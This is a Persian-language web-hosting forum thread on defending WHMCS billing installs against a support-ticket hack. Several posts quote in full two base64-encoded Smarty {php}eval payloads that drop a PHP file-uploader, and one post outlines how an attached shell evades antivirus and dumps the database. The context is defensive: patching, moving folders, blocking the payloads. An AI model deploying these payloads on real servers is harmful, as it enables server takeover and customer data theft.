آموزش رفع مشکل امنیتی whmcs

اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید

کد PHP:

---

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";  
?>

---

به جای username نام کاربری یوزر سیپنل رو بنویسید
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

کد PHP:

---

 {php}eval(base64_decode('  JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz   hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2   YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF   dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC   c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1   pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U   QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn   pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi   MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT   kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB   WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV   cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk   ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE   lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI   c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3   ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g   PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG  NvZGUpOw=='));{/php} 


---

کد PHP:

---

 {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php} 


---

را بلوک کنید

به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444

فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید

خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
آپلود کردن دهن سرویس ها
چون آنتی ویروس های سرور به سرعت شناساییش میکنن
حتی برای محکم کاری ظاهراً هر فایلی آپلود میشه آنتی ویروس سی پنل چک میکنه
اینا با یه روش نابغه گرانه
فایل رو بصورت
gzip
شده آپلود کردن و بعد از حالت کمپرس خارج کردن

سپس با همون شل میره وصل میشه به دیتابیس مربوطه و همه چیو دامپ و دانلود میکنه
patchi
هم که داده شده میاد این راه رو از طریق اصلاح فایل
functions
میبنده

جالبه بدونین
این گروهی که این هک رو داده
از اکسپلویت اخیر
Local File Disclosure
استفاده کاملتری کرده
و این مورد رو داده بیرون
با اینکه خودم طعمه این هک شدم و احساس بسیار بدی دارم که تمام تلاشام بی هوده بوده و از بین خواهد رفت
اما کارشون رو در نوشتن و اجرای این هک فوق العاده تحسین میکنم!

ضمناً اینم در نظر داشته باشید
تغییر و کم کردن سایز
text
در
submitticket
بی فایده هست و راه دور زدنش بسیار راحته!
(کاری که یکی از دوستان پیشنهاد داده بود)

الان میفهمم رعایت خیلی از نکات امنیتی
نه تنها بیمورد نیست
بلکه شرط کافی نیز نیست!
از جمله نصب این سیستم روی یک سرور جدا
استفاده نکردن از هاستینگ اشتراکی
نصب نداشتن سیستم های
cms
دیگر
استفاده نکردن از سیستم نال
و استفاده از لایسنس اصل
اصول حفاظت از اطلاعات مهم یک سایت هست

این مورد تجربه ای خواهد شد برای من و همه دوستان
گرچه ما ایرانیارو جون به جونمون کنن کار خودمونو میکنیم

فقط امیدوارم استفاده نا صحیح از اطلاعات دیتابیس من و خیلی دیگر از دوستان نشه
خیلی ناراحت کنندست اما به هر حال اتفاقیه که افتاده
ازین به بعد مراقب باشید

از قدیم گفتن اول امنیت خودتو رعایت کن
بعد خر ***و بچسبین
مایی که درمون رو قفل نزدیم
اینقدر دنبال اینکه کی مارو هک کرده نباشیم و این حرفای حاشیه ای
این جوجه هکر این کارو نمیکرد یکی دیگه میکرد

حالا سایت های خارجی رو ببینید
با این همه اطلاعات کارت های اعتباری ذخیره شده و لو رفته
ما که هیچی!

فقط یادتون باشه
اگر یکبار هک شده باشید
ممکنه هکر توی هر پوشه ای به هر اسمی یه شل گذاشته باشه!
پس بسیار مراقب باشید

در آخر منتظر فروش دیتابیس های سایت های بیچاره در روزهای آتی باشید
چه لذت و منفعتی برای اونا و چه بیچارگی برای ما خواهد داشت...

و در آخر پیشنهاد میکنم دستپاچه نشین قبل از هر کاری یه بک آپ از کل سیستم و فایلاتون بگیرین که اگه یه عوضی زد همشو پاک کرد وضع ازین بدتر نشه!

و سخن آخر با کسایی که اینکارو کردن یا میخوان بکنن
فکر نکنید با تغییر آی پی هر کاری خواستین میکنید
مطمئن باشید کسانی توی این فروم هستن که به راحتی پیداتون میکنن
و اونوقت دیگه کار از کار گذشته
مطمئن باشید کسایی که هک شدن بی کار نخواهند نشست

نقل قول:

---

نوشته اصلی توسط dm800pvr

خدمت دوستان عزیز عرض کنم
روش این هک به این صورته
کد وقتی در تیکت ارسال میشه
فایل آپلودر در پوشه دانلود ایجاد میشه
b0x.php
سپس هکر با یک اسکریپت شل به راحتی میتونه دسترسی به فایل
مثل c99shell
معروف
configuration
و سپس خوندن مشخصات کامل دیتابیستون کنه
فایل شل هم بصورت
base64
آپلود کردن دهن سرویس ها
چون آنتی ویروس های سرور به سرعت شناساییش میکنن
حتی برای محکم کاری ظاهراً هر فایلی آپلود میشه آنتی ویروس سی پنل چک میکنه
اینا با یه روش نابغه گرانه
فایل رو بصورت
gzip
شده آپلود کردن و بعد از حالت کمپرس خارج کردن

سپس با همون شل میره وصل میشه به دیتابیس مربوطه و همه چیو دامپ و دانلود میکنه
patchi
هم که داده شده میاد این راه رو از طریق اصلاح فایل
functions
میبنده

جالبه بدونین
این گروهی که این هک رو داده
از اکسپلویت اخیر
Local File Disclosure
استفاده کاملتری کرده
و این مورد رو داده بیرون
با اینکه خودم طعمه این هک شدم و احساس بسیار بدی دارم که تمام تلاشام بی هوده بوده و از بین خواهد رفت
اما کارشون رو در نوشتن و اجرای این هک فوق العاده تحسین میکنم!

ضمناً اینم در نظر داشته باشید
تغییر و کم کردن سایز
text
در
submitticket
بی فایده هست و راه دور زدنش بسیار راحته!
(کاری که یکی از دوستان پیشنهاد داده بود)

الان میفهمم رعایت خیلی از نکات امنیتی
نه تنها بیمورد نیست
بلکه شرط کافی نیز نیست!
از جمله نصب این سیستم روی یک سرور جدا
استفاده نکردن از هاستینگ اشتراکی
نصب نداشتن سیستم های
cms
دیگر
استفاده نکردن از سیستم نال
و استفاده از لایسنس اصل
اصول حفاظت از اطلاعات مهم یک سایت هست

این مورد تجربه ای خواهد شد برای من و همه دوستان
گرچه ما ایرانیارو جون به جونمون کنن کار خودمونو میکنیم

فقط امیدوارم استفاده نا صحیح از اطلاعات دیتابیس من و خیلی دیگر از دوستان نشه
خیلی ناراحت کنندست اما به هر حال اتفاقیه که افتاده
ازین به بعد مراقب باشید

از قدیم گفتن اول امنیت خودتو رعایت کن
بعد خر ***و بچسبین
مایی که درمون رو قفل نزدیم
اینقدر دنبال اینکه کی مارو هک کرده نباشیم و این حرفای حاشیه ای
این جوجه هکر این کارو نمیکرد یکی دیگه میکرد

حالا سایت های خارجی رو ببینید
با این همه اطلاعات کارت های اعتباری ذخیره شده و لو رفته
ما که هیچی!

فقط یادتون باشه
اگر یکبار هک شده باشید
ممکنه هکر توی هر پوشه ای به هر اسمی یه شل گذاشته باشه!
پس بسیار مراقب باشید

در آخر منتظر فروش دیتابیس های سایت های بیچاره در روزهای آتی باشید
چه لذت و منفعتی برای اونا و چه بیچارگی برای ما خواهد داشت...

و در آخر پیشنهاد میکنم دستپاچه نشین قبل از هر کاری یه بک آپ از کل سیستم و فایلاتون بگیرین که اگه یه عوضی زد همشو پاک کرد وضع ازین بدتر نشه!

و سخن آخر با کسایی که اینکارو کردن یا میخوان بکنن
فکر نکنید با تغییر آی پی هر کاری خواستین میکنید
مطمئن باشید کسانی توی این فروم هستن که به راحتی پیداتون میکنن
و اونوقت دیگه کار از کار گذشته
مطمئن باشید کسایی که هک شدن بی کار نخواهند نشست

---

لول :d

توأم هک شدی؟ :78:

خود WHMCS بار ها تاکید کرده بود که دایرکتوری folder های download , templates_c و attachment رو تغییر بدید!
بنده این کار رو انجام دادم
دو ماه هست که تیکت های هکر ها را دریافت میکنیم (بیش از 150 عدد تیکت تا کنون دریافت شده) ولی مشکل امنیتی برای ما ایجاد نشده است.
در ضمن در پوشه download میتوانید با اضافه کردن یک Role در .httaccess کلا از اجرای PHP جلوگیری کنید. (قبلا اموزش رو در همین انجمن دیدم...)
ارادتمند

قبل از پست زدن یه سرج کنید بهتره!
http://www.webhostingtalk.ir/f178/36106/

اگه بحث اینه که شمام قبل از پست زدم یه سرچ بکنید
http://www.webhostingtalk.ir/f177/36031/
این تاپیکم به سفارش دوستان زدم

پچ امنیتی functions.php رو کدوم فایل بریزم؟

---------- Post added at 02:15 PM ---------- Previous post was at 02:12 PM ----------

نقل قول:

---

نوشته اصلی توسط info_dlsong

خود WHMCS بار ها تاکید کرده بود که دایرکتوری folder های download , templates_c و attachment رو تغییر بدید!
بنده این کار رو انجام دادم
دو ماه هست که تیکت های هکر ها را دریافت میکنیم (بیش از 150 عدد تیکت تا کنون دریافت شده) ولی مشکل امنیتی برای ما ایجاد نشده است.
در ضمن در پوشه download میتوانید با اضافه کردن یک Role در .httaccess کلا از اجرای PHP جلوگیری کنید. (قبلا اموزش رو در همین انجمن دیدم...)
ارادتمند

---

می تونی طریقه اضافه کردن Rolo رو کامل توضیح بدی؟

نقل قول:

---

نوشته اصلی توسط vps-baran.ir

پچ امنیتی functions.php رو کدوم فایل بریزم؟

---

داخل فولدر include جایگزین کن

این کد رو چه طوری جای گزین کنم

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>

نقل قول:

---

نوشته اصلی توسط vps-baran.ir

این کد رو چه طوری جای گزین کنم

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";
?>

---

داخل فایل configuration.php ادیت کنید

به جای username نام کاربری یوزر سیپنل رو بنویسید

معنی یوزر سیپنل چی میشه؟

---------- Post added at 02:48 PM ---------- Previous post was at 02:44 PM ----------

این خط رو چه کار کنم فایل های گفته شده رو بردم قبل از public_html الان این کد رو چه کار کنم

$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

نقل قول:

---

نوشته اصلی توسط vps-baran.ir

به جای username نام کاربری یوزر سیپنل رو بنویسید

معنی یوزر سیپنل چی میشه؟

---------- Post added at 02:48 PM ---------- Previous post was at 02:44 PM ----------

این خط رو چه مار کنم فایل های گفته شده رو بردم قبل از public_html الان این کد رو چه کار کنم

$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

---

نام کاربری ای که از طریق اون وارد cpanel میشید

این کدها رو داخل همون فایل configuration.php اضافه کن

مثلا این طوری باشه؟

/home/username/templates_c

یا این طوری ؟

/public_html/username/templates_c

---------- Post added at 03:22 PM ---------- Previous post was at 02:56 PM ----------

منتظر جواب هستم

/home/username/templates_c

سلام، خوب این صفر ها که گذاشتید چی اینا هم باید صفر بشن یا خواستید اطلاعات فایل کانفیگ رو مخفی کنید؟

دوستان ما همین کارو کردیم
ولی تیکت ها ذخیره نمیشند مشکل از چی میتونه باشه ؟

به من هم حمله کرد یه هکر عرب ولی مچش رو گرفتم و مشکل حل شد. هنوزم میفرسته تیکت ...

در قسمت مدیریت whmcs بعد Spam Control این دو کدی که دوستمون ( استارتر ) گفتن نبود این دوتا رو باید اضافه کنم یا روش بلوکه کردنش چیه ؟ نسخه من 4.1.2 هست

نقل قول:

---

نوشته اصلی توسط dertgtr

در قسمت مدیریت whmcs بعد Spam Control این دو کدی که دوستمون ( استارتر ) گفتن نبود این دوتا رو باید اضافه کنم یا روش بلوکه کردنش چیه ؟ نسخه من 4.1.2 هست

---

این کدها رو خودتون اضافه کنید در همون قسمت گفته شده به عنوان سابجکت

نقل قول:

---

نوشته اصلی توسط maryam1

اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید

کد PHP:

---

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";  
?>

---

به جای username نام کاربری یوزر سیپنل رو بنویسید
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

کد PHP:

---

 {php}eval(base64_decode('  JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz   hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2   YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF   dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC   c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1   pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U   QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn   pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi   MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT   kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB   WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV   cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk   ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE   lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI   c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3   ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g   PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG  NvZGUpOw=='));{/php} 


---

کد PHP:

---

 {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php} 


---

را بلوک کنید

به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444

فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید

---

بلاخره این کارو انجام بدیم بهتره یا ندیم
منظور ایشون dm800pvr این بوده که بعد انجام این کار هک شدن ؟

نقل قول:

---

نوشته اصلی توسط tizparvaz

بلاخره این کارو انجام بدیم بهتره یا ندیم
منظور ایشون dm800pvr این بوده که بعد انجام این کار هک شدن ؟

---

شما آخرین نسخه whmcs رو به صورت قانونی تهیه کنید و با توجه آموزش خود whmcs از لینک زیر اقدام کنید هیچ مشکلی پیش نمی یاد:
Further Security Steps - WHMCS Documentation
ما از این طریق اقدام کردیم و هک هم نشدیم

من بالاخره موضوع این صفرها رو نفهمیدم

مگه بدون تعریف دیتابیس و اینها پنل کار میکنه ؟

دوستمون گفتم صفر بزارید اما تو این حالت مشکلی پیش نمی اد ؟ میشه یکم موضوع این صفرها رو باز کنید ؟

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";

نقل قول:

---

نوشته اصلی توسط astro.alireza

شما آخرین نسخه whmcs رو به صورت قانونی تهیه کنید و با توجه آموزش خود whmcs از لینک زیر اقدام کنید هیچ مشکلی پیش نمی یاد:
Further Security Steps - WHMCS Documentation
ما از این طریق اقدام کردیم و هک هم نشدیم

---

اینکارهارو کامل انجام دادم حالا واسه قضیه اون تیکت معروفی که میزنن و یه آپلودرو این حرفا میارن تو سایت واسه اون باید چیکار کرد ؟
و چطوری باید چک کرد که آیا تا الان ان اتفاق افتاده یا نه

نقل قول:

---

نوشته اصلی توسط fun_9990

من بالاخره موضوع این صفرها رو نفهمیدم

مگه بدون تعریف دیتابیس و اینها پنل کار میکنه ؟

دوستمون گفتم صفر بزارید اما تو این حالت مشکلی پیش نمی اد ؟ میشه یکم موضوع این صفرها رو باز کنید ؟

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";

---

دوست من ایشون فایل کانفیگ خودشون رو مثال زدن و جای نام دیتابیس خودشون 000 زدن شما دیتابیس خودتون رو قرار بدید نمیتونن ایشون تو مثال یوزر و پسورد دیتابیس خودشون رو قرار بدن که

---------- Post added at 10:32 AM ---------- Previous post was at 10:30 AM ----------

نقل قول:

---

نوشته اصلی توسط tizparvaz

اینکارهارو کامل انجام دادم حالا واسه قضیه اون تیکت معروفی که میزنن و یه آپلودرو این حرفا میارن تو سایت واسه اون باید چیکار کرد ؟
و چطوری باید چک کرد که آیا تا الان ان اتفاق افتاده یا نه

---

اگر هکر یک هکر واقعی باشه و خودش کد base64 رو دستکاری کرده باشه که میشه خیلی راحت هم اینکارو کرد ممکنه تو هر پوشه ای از فایلهای شما اینکارو کرده باشه

اگر کسی قبلا چنین تیکت هایی ارسال کرده و حذفش نکردید اون کد رو بریزید تو نود پد

پ.خ کنید تا بگم کجا دست برده. (دیکد بکنم براتون)

اگر هکر یک هکر واقعی باشه و خودش کد base64 رو دستکاری کرده باشه که میشه خیلی راحت هم اینکارو کرد ممکنه تو هر پوشه ای از فایلهای شما اینکارو کرده باشه

اگر کسی قبلا چنین تیکت هایی ارسال کرده و حذفش نکردید اون کد رو بریزید تو نود پد

پ.خ کنید تا بگم کجا دست برده. (دیکد بکنم براتون)[/QUOTE]

نه دست نبرده فقط میخوام بدونم همین کارها کافیه یا باید کار دیگه ای هم انجام بشه ؟

نقل قول:

---

نوشته اصلی توسط maryam1

اول از همه نصب پچ امنیتی که در آدرس زیر هست
Security Patch - WHMCS Forums
و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
بعد برید داخل فایل
configuration.php
و اونو به این شکل در بیارید

کد PHP:

---

<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
$cc_encryption_hash = "0000000000000000000000000000000000000";
$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";  
?>

---

به جای username نام کاربری یوزر سیپنل رو بنویسید
و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک

کد PHP:

---

 {php}eval(base64_decode('  JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz   hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2   YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF   dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC   c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1   pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U   QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn   pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi   MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT   kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB   WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV   cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk   ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE   lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI   c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3   ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g   PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG  NvZGUpOw=='));{/php} 


---

کد PHP:

---

 {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php} 


---

را بلوک کنید

به همین راحتی
دسترسی فایل کانفیگم بذارید رو 444

فقط پچ رو علاوه بر جایی که
whmcs
رو نصب کردید داخل
include
هم نصب کنید

---

با عرض سلام -من هرکار کردم نتونستم جای پوشه ها را عوض کنم یعنی تا کد را میزارم این اخطار را میده
The templates compiling directory '/home/***********/templates_c/' must be writeable (CHMOD 777) before you can continue.
If the path shown is incorrect, you can update it in the configuration.php file.

فرض کنید من whcms را در پوشه clinet قرار دادم و 3 تا پوشه یاد شد را در پوشه a قرار دادم حالا کدم به چه صورت میشه ؟




"و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه"

این لوکال کجا است ؟ دقیقا اسم پوشه اش چیه من پوشه ای به این نام ندیدم ؟
با تشکر

سه تا پوشه گفته شده رو نباید توی پوشه a قرار بدید.
فرض کنید سه پوشه این ها هستند:
$templates_compiledir = "/home/hamid/public_html/client/templates_c/";
$attachments_dir = "/home/hamid/public_html/client/attachments/";
$downloads_dir = "/home/hamid/public_html/client/downloads/";

مثلا whmcs شما هست:
/home/hamid/public_html/client

حالا اون سه پوشه رو میزارید توی آدرس زیر:
home/hamid
و در فایل configuration.php هم کدهای گفته شده رو میزارید:

$templates_compiledir = "/home/hamid/templates_c/";
$attachments_dir = "/home/hamid/attachments/";
$downloads_dir = "/home/hamid/downloads/";

سلام و خسته نباشید امروز متوجه شدم یکی از دوستان عزیزمون بازم یه کد جدید پیدا کرده که نیمه کاره کپی کرده ولی برای شما هم میگذارم تا با اون آشنا بشید این کد بیس 64 شده اش هست

